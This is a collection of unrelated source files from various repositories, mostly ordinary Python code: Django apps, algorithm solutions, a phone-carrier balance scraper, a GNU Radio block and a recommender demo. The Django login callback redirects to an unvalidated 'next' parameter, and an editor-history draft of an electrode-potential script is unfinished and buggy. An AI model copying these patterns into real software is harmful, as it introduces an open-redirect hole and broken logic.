    dag.set_dependency('import_huawei_2g_nbi_data', 'join_huawei_2g_importer')
    dag.set_dependency('run_huawei_gexport_gsm_insert_queries', 'join_huawei_2g_importer')

    return dag
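The same wiring in Airflow's bitshift notation would read as below, a sketch equivalent to the set_dependency calls (which key off task_id) if placed inside the function body:

t23 >> [import_mml_csv, import_nbi_csv, import_gexport_csv]
import_gexport_csv >> t_run_huawei_gexport_gsm_insert_queries >> t_join
[import_mml_csv, import_nbi_csv] >> t_join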
authors: ["emmanuel.ssebaggala@bodastage.com"] | author_id: emmanuel.ssebaggala@bodastage.com

blob_id: 7f1d778988aaa8410b69aaff2a859853bb5d7817 | directory_id: 97eac4a05c77e1b6898b84c9606afa13428e45df | content_id: 80fe8dd1ef24fad7bc08caf50d061bf609d82710
path: /024_Lexicographic_permutations.py
detected_licenses: [] | license_type: no_license
repo_name: ryanmcg86/Euler_Answers | snapshot_id: 8f71b93ea15fceeeeb6b661d7401e40b760a38e6 | revision_id: 28374025448b16aab9ed1dd801aafc3d602f7da8 | branch_name: refs/heads/master
visit_date: 2022-08-11T13:31:11.038918 | revision_date: 2022-07-28T00:35:11 | committer_date: 2022-07-28T00:35:11
github_id: 190,278,288 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,682 | extension: py
content:
'''A permutation is an ordered arrangement of objects.
For example, 3124 is one possible permutation of the digits 1, 2, 3 and 4.
If all of the permutations are listed numerically or alphabetically, we call it lexicographic order.
The lexicographic permutations of 0, 1 and 2 are:
012 021 102 120 201 210
What is the millionth lexicographic permutation of the digits 0, 1, 2, 3, 4, 5, 6, 7, 8 and 9?
Link: https://projecteuler.net/problem=24'''
#Imports
import time

#Build a factorial function
def fact(n):
    ans = 1
    for i in range(1, n + 1):
        ans *= i
    return ans

#Build a suffix function
def buildSuffix(num):
    suff = 'th'
    begin = len(str(num)) - 2
    end = begin + 1
    suffixes = [[1, 'st'], [2, 'nd'], [3, 'rd']]
    if str(num)[begin:end] != '1':  # tens digit of 1 means 11th/12th/13th
        for i in range(0, len(suffixes)):
            if int(str(num)[-1]) == suffixes[i][0]:  # colon was missing here
                suff = suffixes[i][1]
    return suff

#Build a perm function
def perm(n, s):
    if len(s) == 1: return s
    q, r = divmod(n, fact(len(s) - 1))
    return s[q] + perm(r, s[:q] + s[q + 1:])

#Build a lexicographic permutation function
#that returns the nth lexicographic permutation
#of a given input of numbers
def lexiPermutation(digits, permCount):
    start = time.time()
    num = perm(permCount - 1, digits)
    suff = buildSuffix(permCount)
    permCount = str(permCount) + suff
    # print statements converted from Python 2 to Python 3 calls
    print('The ' + permCount + ' lexicographic permutation of the given digits is ' + str(num) + '.')
    print('This took ' + str(time.time() - start) + ' seconds to calculate.')

#Run the program
digits = '0123456789'
permCount = 1000000
lexiPermutation(digits, permCount)
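perm walks the factorial number system: the leading digit is index n // 9! into the remaining digits, then it recurses on the remainder. A hand-checked first step for the millionth permutation:

# perm(999999, '0123456789'):
# 999999 // fact(9) = 999999 // 362880 = 2, remainder 274239,
# so the first digit is '0123456789'[2] == '2' and the recursion continues
# with index 274239 over '013456789'. The final result is '2783915460',
# the well-known answer to Project Euler 24.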
authors: ["noreply@github.com"] | author_id: ryanmcg86.noreply@github.com

blob_id: a725d5a7921317bce3d96785f012f2976cfb7fb9 | directory_id: 8b69984781bffb117f4adb5fbff2a75c0b31294f | content_id: 00ca6e3e7e58e40c8ac5de8eb3367407d2448966
path: /userinfo/migrations/0001_initial.py
detected_licenses: [] | license_type: no_license
repo_name: kkamagwi/childOfChange | snapshot_id: 899c5ee035090f9ab2d176a9d39cd58a48f01d39 | revision_id: 8041cbfbda75e74ef1ae2470586abf45d4d431e9 | branch_name: refs/heads/main
visit_date: 2023-07-14T10:21:49.981455 | revision_date: 2021-08-13T13:44:32 | committer_date: 2021-08-13T13:44:32
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 594 | extension: py
content:
# Generated by Django 3.2.5 on 2021-07-05 08:45

from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='UserContacts',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30)),
                ('phone', models.IntegerField()),
                ('question', models.TextField()),
            ],
        ),
    ]
authors: ["you@example.com"] | author_id: you@example.com

blob_id: 986e36d2846558b181df26b7503d003c0c9797cc | directory_id: f02fe8cd0506695e56570ecbb5be6e28cda55a2e | content_id: dadcfb04f4361a45d7dc7c4b3fd37b406983f917
path: /course_tracker/hu_authz_handler/views.py
detected_licenses: [] | license_type: no_license
repo_name: raprasad/Course-Tracker | snapshot_id: 71ec045024d3adc7ef061857696b3751452ce8c6 | revision_id: dc5107b923c73fb73bea84dfc2df4c989c7fe231 | branch_name: refs/heads/master
visit_date: 2021-01-25T08:28:18.743834 | revision_date: 2014-11-11T15:51:02 | committer_date: 2014-11-11T15:51:02
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 3,336 | extension: py
content:
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.template import RequestContext
from django.shortcuts import render_to_response
from django.core.urlresolvers import reverse
from django.contrib.auth import authenticate, login
from django.contrib.auth import logout
from django.core.mail import send_mail

from hu_authzproxy.authzproxy_login_handler import AuthZProxyLoginHandler
from hu_authzproxy.authz_proxy_validation_info import AuthZProxyValidationInfo

from django.conf import settings

#import logging
#logger = logging.getLogger(__name__)


def view_handle_authz_callback(request):
    """View to handle pin callback.
    If authentication is successful:
        - go to a specified 'next' link
        - or default to the django admin index page
    """
    if request.GET and request.GET.get('next', None) is not None:
        next = request.GET.get('next')
    else:
        next = reverse('admin:index', args={})
    #next = reverse('admin:index', args={})

    # How Django handles authentication after pin is verified.
    # See "pin_login_handler.PinLoginHandler" class handler for more info
    # This allows anyone with a harvard pin to log in
    access_settings = {'restrict_to_existing_users': True,
                       'restrict_to_active_users': True,
                       'restrict_to_staff': True,
                       'restrict_to_superusers': False}

    authz_validation_info = AuthZProxyValidationInfo(request=request,
                                                     app_names=settings.HU_PIN_LOGIN_APP_NAMES,
                                                     gnupghome=settings.GNUPG_HOME,
                                                     gpg_passphrase=settings.GPG_PASSPHRASE,
                                                     is_debug=settings.DEBUG)
    authz_pin_login_handler = AuthZProxyLoginHandler(authz_validation_info, **access_settings)

    if authz_pin_login_handler.did_login_succeed():
        login(request, authz_pin_login_handler.get_user())
        return HttpResponseRedirect(next)

    # Errors while logging in!
    #
    # Retrieve error messages from the AuthZProxyLoginHandler
    error_messages = []
    authz_errs = authz_pin_login_handler.get_err_msgs()
    if not authz_errs is None:
        error_messages += authz_errs

    # Retrieve error flags from the AuthZProxyLoginHandler
    err_dict = authz_pin_login_handler.get_error_dict()  # get error lookup for use
    for k, v in err_dict.iteritems():
        if v is True:
            error_messages.append(' %s -> [%s]' % (k, v))
            print ' %s -> [%s]' % (k, v)

    # add the user IP address
    error_messages.append('user IP address: %s' % request.META.get('REMOTE_ADDR', None))

    # send email message to the admins
    try:
        admin_emails = map(lambda x: x[1], settings.ADMINS)
    except:
        admin_emails = None

    #print admin_emails
    if admin_emails and len(admin_emails) > 0:
        send_mail('Course database log in fail info', 'Here is the message. %s' % ('\n'.join(error_messages)), admin_emails[0], admin_emails, fail_silently=False)

    # send the error flags to the template
    return render_to_response('hu_authz_handler/view_authz_login_failed.html', err_dict, context_instance=RequestContext(request))
|
[
"raman_prasad@harvard.edu"
] |
raman_prasad@harvard.edu
|
6da90b055be7beefd62289bc89d91a7ab8de662d
|
53c157cca69d6ae719cb71d4917ee2f53a10b8e6
|
/mobile_balance/mts.py
|
515a21723e044c6650f8cf528223bc05c1027c56
|
[] |
no_license
|
Ksardos/mobile-balance
|
03fdb072a364dee7f0c470f7069672c7b64ffa61
|
0f13d6be36c58abf401cb382fc85a75542adcdd5
|
refs/heads/master
| 2021-01-15T10:50:47.417407
| 2016-06-07T12:12:13
| 2016-06-07T12:12:13
| 78,822,827
| 0
| 0
| null | 2017-01-13T06:40:07
| 2017-01-13T06:40:07
| null |
UTF-8
|
Python
| false
| false
| 1,516
|
py
|
#!/usr/bin/env python
import requests
import re
from .exceptions import BadResponse
from .utils import check_status_code
def get_balance(number, password):
session = requests.Session()
response = session.get('https://login.mts.ru/amserver/UI/Login')
check_status_code(response, 401)
csrf_token = re.search(r'name="csrf.sign" value="(.*?)"', response.content)
if csrf_token is None:
raise BadResponse('CSRF token not found', response)
csrf_token = csrf_token.group(1)
response = session.post('https://login.mts.ru/amserver/UI/Login?service=lk&goto=https://lk.ssl.mts.ru/',
data={'IDToken1': number,
'IDToken2': password,
'csrf.sign': csrf_token,
},
headers={
'Accept-Language': 'ru,en;q=0.8',
})
check_status_code(response, 200)
response = session.get('https://oauth.mts.ru/webapi-1.4/customers/@me')
check_status_code(response, 200)
data = response.json()
relations = data['genericRelations']
targets = [rel['target'] for rel in relations]
accounts = [target for target in targets if target['@c'] == '.Account']
if not accounts:
raise RuntimeError('Account not found in the data response')
balance = accounts[0].get('balance')
if balance is None:
raise BadResponse('Unable to get balance from JSON', response)
return float(balance)
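# Usage sketch (editor's addition; the credentials are hypothetical and the
# import path assumes this repo's package layout):
#
#     from mobile_balance.mts import get_balance
#     balance = get_balance('9161234567', 'secret')  # phone number, account password
#     print(balance)
#
# get_balance raises BadResponse when the CSRF token or the balance cannot
# be extracted, so callers may want to wrap it in a try/except.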
|
[
"svetlyak.40wt@gmail.com"
] |
svetlyak.40wt@gmail.com
|
a465a6c6bfb2e0461cae260d9295a33bb90d79f2
|
d974256fed39a5583012b17fd9c371121271814b
|
/charpter_04/test/client.py
|
7bf183d5b1b86c1fceee40195c7030cf02fc7bf8
|
[] |
no_license
|
gbkuce/spider-courses
|
18ce88beb120641eae19c01f331ddd53adc4105a
|
3364b651149da600c51ed8d0d93a7e0cb4bc5211
|
refs/heads/master
| 2021-01-20T13:56:31.879419
| 2017-04-08T03:38:35
| 2017-04-08T03:38:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 178
|
py
|
import socket
import sys
sock = socket.create_connection(('localhost', 20012))
sock.send('Client Request')
data = sock.recv(1024)
print 'data received: ' + data
sock.close()
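# A matching server (editor's sketch; the reply text is an assumption --
# only the host/port pair localhost:20012 is implied by this client):
#
#     import socket
#     server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     server.bind(('localhost', 20012))
#     server.listen(1)
#     conn, addr = server.accept()
#     request = conn.recv(1024)
#     conn.send('Server Reply')
#     conn.close()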
|
[
"hezhen112058@pwrd.com"
] |
hezhen112058@pwrd.com
|
b7c5b0a0bd0c73406067db7c8d978a348d299ee3
|
5b188a06f9b615b8a4541074fc50eeb1bfac5d97
|
/链表/reverseKGroup.py
|
82d64ffbfca37579083481a2d75302347af73f4c
|
[] |
no_license
|
yinyinyin123/algorithm
|
3a8cf48a48bd2758c1e156c8f46161fe3697342f
|
b53f030ea3a4e2f6451c18d43336ff9c5d7433af
|
refs/heads/master
| 2021-01-07T20:07:12.544539
| 2020-08-31T05:16:44
| 2020-08-31T05:16:44
| 241,807,608
| 5
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,227
|
py
|
### 2020/06/01
### LeetCode 25: Reverse Nodes in k-Group
### one code one day
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def reverseKGroup(self, head: ListNode, k: int) -> ListNode:
        ### helper: reverse the sublist from start to end
def reverse(start, end):
prev = None
pcur = start
end.next = None
while(pcur):
temp = pcur.next
pcur.next = prev
prev = pcur
pcur = temp
return prev, start
start = end = head
connect = res = None
step = 0
while(end):
step += 1
if(step == k):
temp = end.next
subhead, subtail = reverse(start, end)
if(res):
connect.next = subhead
else:
res = subhead
connect = subtail
start = end = temp
step = 0
else:
end = end.next
if(start == head):
return head
elif(start):
connect.next = start
return res
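### Usage sketch (editor's addition; assumes the commented-out ListNode above):
###   build 1->2->3->4->5, then Solution().reverseKGroup(head, 2)
###   returns 2->1->4->3->5 -- a trailing group of fewer than k nodes is
###   left untouched, which is what the final start/connect check handles.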
|
[
"1350526138@qq.com"
] |
1350526138@qq.com
|
276efbcd6b20cba653bfd60fa8fb2c22d660d55c
|
48f7750776fbd4ba7e71dd3832cf1159222f759e
|
/tests/trailing_whitespace_fixer_test.py
|
1c57b10ee1cf8c58b4da84c30418537434bdfa6e
|
[
"MIT"
] |
permissive
|
exKAZUu/pre-commit-hooks
|
9718bd44aa84ba7a4ab21c34d9f33b628c0b7807
|
b85d7ac38f392a8f8b98732c61005d55c892577b
|
refs/heads/master
| 2021-01-20T10:51:20.996895
| 2014-12-22T00:52:16
| 2014-12-22T03:46:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 824
|
py
|
from plumbum import local
from pre_commit_hooks.trailing_whitespace_fixer import fix_trailing_whitespace
def test_fixes_trailing_whitespace(tmpdir):
with local.cwd(tmpdir.strpath):
for filename, contents in (
('foo.py', 'foo \nbar \n'),
('bar.py', 'bar\t\nbaz\t\n'),
):
with open(filename, 'w') as f:
f.write(contents) # pragma: no cover (python 2.6 coverage bug)
ret = fix_trailing_whitespace(['foo.py', 'bar.py'])
assert ret == 1
for filename, after_contents in (
('foo.py', 'foo\nbar\n'),
('bar.py', 'bar\nbaz\n'),
):
assert open(filename).read() == after_contents
def test_returns_zero_for_no_changes():
assert fix_trailing_whitespace([__file__]) == 0
|
[
"asottile@umich.edu"
] |
asottile@umich.edu
|
116b0018982e3810edfd8a850cd43d84bac97cff
|
9fc768c541145c1996f2bdb8a5d62d523f24215f
|
/code/Examples/ch5/E_5_11.py
|
1ef351797adac178ddaba4e92fb9cfee5488d852
|
[] |
no_license
|
jumbokh/pyclass
|
3b624101a8e43361458130047b87865852f72734
|
bf2d5bcca4fff87cb695c8cec17fa2b1bbdf2ce5
|
refs/heads/master
| 2022-12-25T12:15:38.262468
| 2020-09-26T09:08:46
| 2020-09-26T09:08:46
| 283,708,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 265
|
py
|
# E_5_11 Purpose: repeatedly generate random numbers (integers 0 to 9) until the generated value is zero.
import random as rd
num=rd.randint(0,9)
count=1
while num!=0:
print(num)
count+=1
num=rd.randint(0,9)
print(num)
print('%s%d%s' %('共產生亂數',count,'次'))
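# Note (editor's addition): the draw count follows a geometric distribution
# with p = 1/10, so `count` averages about 10 per run.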
|
[
"jumbokh@gmail.com"
] |
jumbokh@gmail.com
|
e73cbc2e1ed90e881b52a090b01e5ab3a5a0d057
|
54156856a1822a4cd6a7e9305369b5fa33b503ac
|
/python/machine-learning/recommendation/collaborative_filter.py
|
c3be7244ae6f685fe36a376371e9018e7cc9fb31
|
[] |
no_license
|
takasashi/sandbox
|
cafd903e7e376485c7fec05f0b4293078147c09f
|
a23d85258b5525498b57672993b25d54fa08f189
|
refs/heads/master
| 2023-07-09T04:37:28.532448
| 2021-08-09T06:11:30
| 2021-08-09T06:11:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,978
|
py
|
from recommendation_data import dataset
from math import sqrt
print(("山田さんのカレーの評価 : {}".format(
dataset['山田']['カレー'])))
print(("山田さんのうどんの評価 : {}\n".format(
dataset['山田']['うどん'])))
print(("佐藤さんのカレーの評価: {}".format(
dataset['佐藤']['カレー'])))
print(("佐藤さんのうどんの評価: {}\n".format(
dataset['佐藤']['うどん'])))
print("鈴木さんのレーティング: {}\n".format((dataset['鈴木'])))
# Implementation of collaborative filtering
def similarity_score(person1, person2):
    # returns a similarity score based on the Euclidean distance between person1 and person2
    both_viewed = {}  # collect the items common to both users
for item in dataset[person1]:
if item in dataset[person2]:
both_viewed[item] = 1
    # return 0 if they have no items in common
if len(both_viewed) == 0:
return 0
    # compute the Euclidean distance
sum_of_eclidean_distance = []
for item in dataset[person1]:
if item in dataset[person2]:
sum_of_eclidean_distance.append(
pow(dataset[person1][item] - dataset[person2][item], 2))
total_of_eclidean_distance = sum(sum_of_eclidean_distance)
return 1 / (1 + sqrt(total_of_eclidean_distance))
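# Worked example (editor's note): identical ratings give distance 0 and a
# score of 1; the score decays toward 0 as the two users' ratings diverge.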
print("山田さんと鈴木さんの類似度 (ユークリッド距離)",
similarity_score('山田', '鈴木'))
def pearson_correlation(person1, person2):
    # collect the items rated by both users
both_rated = {}
for item in dataset[person1]:
if item in dataset[person2]:
both_rated[item] = 1
number_of_ratings = len(both_rated)
    # check for common items; return 0 if there are none
if number_of_ratings == 0:
return 0
    # sum all of each user's preferences
person1_preferences_sum = sum(
[dataset[person1][item] for item in both_rated])
person2_preferences_sum = sum(
[dataset[person2][item] for item in both_rated])
    # compute the sum of squares of each user's preferences
person1_square_preferences_sum = sum(
[pow(dataset[person1][item], 2) for item in both_rated])
person2_square_preferences_sum = sum(
[pow(dataset[person2][item], 2) for item in both_rated])
    # multiply the two users' ratings item by item and sum
product_sum_of_both_users = sum(
[dataset[person1][item] * dataset[person2][item] for item in both_rated])
    # compute the Pearson score
numerator_value = product_sum_of_both_users - \
(person1_preferences_sum * person2_preferences_sum / number_of_ratings)
denominator_value = sqrt((person1_square_preferences_sum - pow(person1_preferences_sum, 2) / number_of_ratings) * (
person2_square_preferences_sum - pow(person2_preferences_sum, 2) / number_of_ratings))
if denominator_value == 0:
return 0
else:
r = numerator_value / denominator_value
return r
print("山田さんと田中さんの類似度 (ピアソン相関係数)",
(pearson_correlation('山田', '田中')))
def most_similar_users(person, number_of_users):
    # return similar users together with their similarity scores
scores = [(pearson_correlation(person, other_person), other_person)
for other_person in dataset if other_person != person]
    # sort so that the most similar person comes first
scores.sort()
scores.reverse()
return scores[0:number_of_users]
print("山田さんに似た人ベスト 3",
most_similar_users('山田', 3))
def user_reommendations(person):
    # derive recommendations from a ranking weighted by other users' similarity
totals = {}
simSums = {}
# rankings_list = []
for other in dataset:
        # do not compare a person with themselves
if other == person:
continue
sim = pearson_correlation(person, other)
# print ">>>>>>>",sim
        # ignore scores of zero or below
if sim <= 0:
continue
for item in dataset[other]:
            # score only the items this person has not rated yet
if item not in dataset[person] or dataset[person][item] == 0:
                # similarity * score
totals.setdefault(item, 0)
totals[item] += dataset[other][item] * sim
                # sum of similarities
simSums.setdefault(item, 0)
simSums[item] += sim
    # build the normalized ranking list
rankings = [(total / simSums[item], item)
for item, total in list(totals.items())]
rankings.sort()
rankings.reverse()
    # return the recommended items
recommendataions_list = [
recommend_item for score, recommend_item in rankings]
return recommendataions_list
print("下林さんにおすすめのメニュー",
user_reommendations('下林'))
|
[
"idnanashi@gmail.com"
] |
idnanashi@gmail.com
|
987121413b17f4207dd02018f8528d8c260df6d6
|
e15e3bba52180f86d7769a0b5ffd97f2b640777e
|
/tests/api-with-examples/api_with_examples/common/types.py
|
c15e02213215c2af34bb781b04b5fb4c5e3c2adb
|
[
"MIT"
] |
permissive
|
stjordanis/openapi-client-generator
|
06237ab4489c296aec0c3c5d3c811f8c2a310023
|
a058af4ec28a1e53809273a662fb8cba0157695e
|
refs/heads/master
| 2023-03-16T10:04:38.122121
| 2021-02-27T22:36:18
| 2021-02-27T22:36:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 638
|
py
|
from enum import Enum
from typing import Optional, Sequence, Any, NamedTuple, Mapping, Union, Tuple, Type
import inflection
from typeit import TypeConstructor, flags
generate_constructor_and_serializer = TypeConstructor
class AttrStyle(Enum):
CAMELIZED = "camelized"
DASHERIZED = "dasherized"
UNDERSCORED = "underscored"
camelized = TypeConstructor & flags.GlobalNameOverride(
lambda x: inflection.camelize(x, uppercase_first_letter=False)
)
dasherized = TypeConstructor & flags.GlobalNameOverride(inflection.dasherize)
underscored = TypeConstructor
AttrOverrides = Mapping[Union[property, Tuple[Type, str]], str]
|
[
"noreply@github.com"
] |
stjordanis.noreply@github.com
|
58a7b1b4074ce5b68a3fb001fdc46c305921fcfd
|
04e26128954d47f4937168d569f800f12cef686d
|
/gnuradio/python/bitErrorRate.py
|
744934e74420d9dd4e07ffc434c01ffb83ae4e8f
|
[] |
no_license
|
franchenstein/tcc
|
02ed9f2666823610c0d025c4b64960813a227bc3
|
b2ec6c2206628672edf004f09c09b68d115bf436
|
refs/heads/master
| 2021-01-13T12:56:30.315840
| 2015-02-10T10:22:34
| 2015-02-10T10:22:34
| 18,018,315
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,090
|
py
|
#!/usr/bin/env python
##################################################
# Gnuradio Python Flow Graph
# Title: Bit Error Rate
# Author: Daniel Franch
# Description: Calculates the BER based on the known original message and the final received message.
# Generated: Fri Aug 1 12:30:06 2014
##################################################
from gnuradio import blocks
from gnuradio import gr
from gnuradio.filter import firdes
import ConfigParser
class bitErrorRate(gr.hier_block2):
def __init__(self):
gr.hier_block2.__init__(
self, "Bit Error Rate",
gr.io_signaturev(2, 2, [gr.sizeof_char*1, gr.sizeof_char*1]),
gr.io_signature(1, 1, gr.sizeof_float*1),
)
##################################################
# Variables
##################################################
self._msgLength_config = ConfigParser.ConfigParser()
self._msgLength_config.read("./configs/sdrConfig.txt")
try: msgLength = self._msgLength_config.getint("main", "key")
except: msgLength = 10000
self.msgLength = msgLength
self._bits_per_byte_config = ConfigParser.ConfigParser()
self._bits_per_byte_config.read("./configs/sdrConfig.txt")
try: bits_per_byte = self._bits_per_byte_config.getint("main", "key")
except: bits_per_byte = 8
self.bits_per_byte = bits_per_byte
intdecim = 100000
if msgLength < intdecim:
intdecim = msgLength
##################################################
# Blocks
##################################################
self.blocks_xor_xx_0 = blocks.xor_bb()
self.blocks_unpack_k_bits_bb_0 = blocks.unpack_k_bits_bb(bits_per_byte)
self.blocks_uchar_to_float_0 = blocks.uchar_to_float()
self.blocks_multiply_const_vxx_0 = blocks.multiply_const_vff((1.0/msgLength, ))
self.blocks_integrate_xx_0 = blocks.integrate_ff(intdecim)
##################################################
# Connections
##################################################
self.connect((self.blocks_integrate_xx_0, 0), (self.blocks_multiply_const_vxx_0, 0))
self.connect((self, 1), (self.blocks_xor_xx_0, 1))
self.connect((self, 0), (self.blocks_xor_xx_0, 0))
self.connect((self.blocks_multiply_const_vxx_0, 0), (self, 0))
self.connect((self.blocks_xor_xx_0, 0), (self.blocks_unpack_k_bits_bb_0, 0))
self.connect((self.blocks_unpack_k_bits_bb_0, 0), (self.blocks_uchar_to_float_0, 0))
self.connect((self.blocks_uchar_to_float_0, 0), (self.blocks_integrate_xx_0, 0))
# QT sink close method reimplementation
def get_msgLength(self):
return self.msgLength
def set_msgLength(self, msgLength):
self.msgLength = msgLength
self.blocks_multiply_const_vxx_0.set_k((1.0/self.msgLength, ))
def get_bits_per_byte(self):
return self.bits_per_byte
def set_bits_per_byte(self, bits_per_byte):
self.bits_per_byte = bits_per_byte
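# Usage sketch (editor's addition; the block names are standard GNU Radio 3.7
# APIs, but the surrounding flowgraph and byte buffers are assumptions):
#
#     from gnuradio import gr, blocks
#     tb = gr.top_block()
#     ber = bitErrorRate()
#     src0 = blocks.vector_source_b(original_bytes)   # known sent message
#     src1 = blocks.vector_source_b(received_bytes)   # demodulated message
#     sink = blocks.vector_sink_f()
#     tb.connect(src0, (ber, 0))
#     tb.connect(src1, (ber, 1))
#     tb.connect(ber, sink)
#     tb.run()                                        # sink.data() then holds the BER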
|
[
"ubuntu@ubuntu.(none)"
] |
ubuntu@ubuntu.(none)
|
86ffd25edee54a08e13df6afc30a3a3348a9b725
|
6bd3ad4389995d6acd5870a8a010d657d5a91b4c
|
/src/adminactions/templatetags/aa_compat.py
|
e3f6ace17242bea3bf45ce0154899e8a7fa1961b
|
[
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] |
permissive
|
timgates42/django-adminactions
|
aa0fa47812c8518ad0a996cac1b52eecc8e47ffb
|
af19dc557811e148b8f74d2a6effcf64afc8e0df
|
refs/heads/master
| 2023-03-16T12:03:40.024049
| 2022-06-26T16:35:03
| 2022-06-26T16:35:03
| 249,811,327
| 0
| 0
|
NOASSERTION
| 2020-03-24T20:31:02
| 2020-03-24T20:31:01
| null |
UTF-8
|
Python
| false
| false
| 185
|
py
|
from django.template import Library
register = Library()
@register.tag
def url(parser, token):
from django.template.defaulttags import url as _url
return _url(parser, token)
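# Usage note (editor's addition): after ``{% load aa_compat %}`` in a
# template, ``{% url 'some-view-name' %}`` resolves through this wrapper,
# which simply defers to Django's built-in ``url`` tag.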
|
[
"s.apostolico@gmail.com"
] |
s.apostolico@gmail.com
|
d853928d83b1bb7774836966374126863002bfec
|
02e23da0431623db86c8138bda350a1d526d4185
|
/Archivos Python Documentos/Graficas/.history/tierras_20200222162818.py
|
074ccb95c2262981a0f5e2bffc88e7ea5bad045c
|
[] |
no_license
|
Jaamunozr/Archivos-python
|
d9996d3d10ff8429cd1b4c2b396016a3a5482889
|
1f0af9ba08f12ac27e111fcceed49bbcf3b39657
|
refs/heads/master
| 2022-08-05T14:49:45.178561
| 2022-07-13T13:44:39
| 2022-07-13T13:44:39
| 244,073,267
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,036
|
py
|
import os
import pylab as pl
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import numpy as np
os.system("clear")
fig = pl.figure()
axx = Axes3D(fig)
raiz=np.sqrt
ln=np.log
X = np.arange(-2, 12, 1)
Y = np.arange(-2, 12, 1)
#X, Y = np.meshgrid(X, Y)
print (np.count_nonzero(X))
l = 2
rho= 100
ik=25
Electrodos=8
E=Electrodos-1
P=np.array([
[0.55, 0.55], #Posicion electrodo A
[4.55, 0.55], #Posicion electrodo B
[8.55, 0.55], #Posicion electrodo C
[0.55, 4.55], #Posicion electrodo D
[8.55, 4.55], #Posicion electrodo E
[0.55, 8.55], #Posicion electrodo F
[4.55, 8.55], #Posicion electrodo G
[8.55, 8.55] #Posicion electrodo H
])
m = np.zeros((Electrodos, 1))  # shape (Electrodos, 0) would leave no column for m[i][0]
V = np.zeros((Electrodos, 1))
print(V)
i = 0
t = 0
while t <= np.count_nonzero(X):
    i = 0  # reset the inner index so each outer pass recomputes the values
    while i <= E:
        m[i][0] = raiz((14 - P[i][0])**2 + (14 - P[i][1])**2)
        V[i][0] = ln((l + raiz(m[i][0]**2 + l**2)) / m[i][0])
        i += 1
    t += 1  # advance the outer counter; without it the loop never terminates
print (V)
print (E)
"""
ma=raiz((X-ax)**2+(Y-ay)**2)
mb=raiz((X-bx)**2+(Y-by)**2)
mc=raiz((X-cx)**2+(Y-cy)**2)
md=raiz((X-dx)**2+(Y-dy)**2)
me=raiz((X-ex)**2+(Y-ey)**2)
mf=raiz((X-fx)**2+(Y-fy)**2)
mg=raiz((X-gx)**2+(Y-gy)**2)
mh=raiz((X-hx)**2+(Y-hy)**2)
va=ln((l+raiz(ma**2+l**2))/ma)
vb=ln((l+raiz(mb**2+l**2))/mb)
vc=ln((l+raiz(mc**2+l**2))/mc)
vd=ln((l+raiz(md**2+l**2))/md)
ve=ln((l+raiz(me**2+l**2))/me)
vf=ln((l+raiz(mf**2+l**2))/mf)
vg=ln((l+raiz(mg**2+l**2))/mg)
vh=ln((l+raiz(mh**2+l**2))/mh)
Vt=((rho*ik)/(2*np.pi))*(va+vb+vc+vd+ve+vf+vg+vh)
print (Vt[::].max())
#print(Vt)
x = X.flatten()
y = Y.flatten()
z = Vt.flatten()
surf = axx.plot_surface(X, Y, Vt, cmap = cm.coolwarm, linewidth=0, antialiased=False)
# Customize the z axis.
axx.set_zlim(300, 3000)
axx.zaxis.set_major_locator(LinearLocator(10))
axx.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
# Add a color bar which maps values to colors.
fig.colorbar(surf, shrink=0.5, aspect=5)
plt.show()
"""
|
[
"jaamunozr@gmail.com"
] |
jaamunozr@gmail.com
|
56af12c570c20f68f2ed9f868404b19006bdf490
|
70e970ce9ec131449b0888388f65f0bb55f098cd
|
/ClosureTests/test/localConfig_2016DEFGH_Tau.py
|
cbb6b9333a4223c9dcec00481c778ed32476b89d
|
[] |
no_license
|
OSU-CMS/DisappTrks
|
53b790cc05cc8fe3a9f7fbd097284c5663e1421d
|
1d1c076863a9f8dbd3f0c077d5821a8333fc5196
|
refs/heads/master
| 2023-09-03T15:10:16.269126
| 2023-05-25T18:37:40
| 2023-05-25T18:37:40
| 13,272,469
| 5
| 12
| null | 2023-09-13T12:15:49
| 2013-10-02T13:58:51
|
Python
|
UTF-8
|
Python
| false
| false
| 503
|
py
|
from DisappTrks.StandardAnalysis.localConfig import *
config_file = "config_2016DEFGH_cfg.py"
intLumi = lumi["HLT_LooseIsoPFTau50_Trk30_eta2p1_v*"]["Tau_2016DEFGH"]
datasetsData = [
'Tau_2016D',
'Tau_2016E',
'Tau_2016F',
'Tau_2016G',
'Tau_2016H',
]
datasets = datasetsBkgd + datasetsData + datasetsSig
#setNJobs (datasets, composite_dataset_definitions, nJobs, 500)
#setDatasetType (datasets, composite_dataset_definitions, types, "bgMC")
#InputCondorArguments["hold"] = "True"
|
[
"ahart@cern.ch"
] |
ahart@cern.ch
|
956f70049baed530b16840b562c15c44f1075815
|
619f28995e61afc6277c6b1ad8a19d08f948bbd9
|
/CrashCourseInPython/test_name_function.py
|
